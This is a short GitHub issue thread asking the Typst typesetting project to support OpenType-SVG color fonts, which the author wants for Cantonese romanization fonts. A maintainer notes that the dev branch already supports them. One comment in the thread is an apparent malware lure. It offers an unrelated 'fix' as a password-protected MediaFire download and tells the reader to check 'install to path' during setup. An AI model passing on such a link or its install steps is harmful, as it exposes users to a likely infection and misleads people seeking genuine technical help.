### ISSUE TITLE
Support OpenType-SVG fonts

### ISSUE THREAD

**Issue by jkwchui** [typst/typst#4866]
### Description

Currently Typst discards everything in the `<svg>` table and instead picks from the regular font outlines.  It would be great if these color fonts can be supported.

I understand that this is probably an upstream limitation, and unlikely to have a easy solution, but just want to put this in your awareness.

### Use Case

I developed a set of color fonts that provides [Cantonese romanization](www.visual-fonts.com) on the Chinese characters, where the colors serve as pedagogical devices and the > 150,000 font features provide the linguistic smarts and the font metric solves the very hairy layout problems.

<img width="1058" alt="canto edu font - Sung lyrics" src="https://github.com/user-attachments/assets/793bf187-5cb0-4b95-a894-1373a1c44dcf">

Currently these can be used in word processors (etc) and Chrome in MacOS, Win 11, and iOS, but there are no type-setting languages that can support OT-SVG.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by laurmaedje** [comment]
OpenType SVG fonts are actually supported in the dev version! You can try it by compiling the main branch.
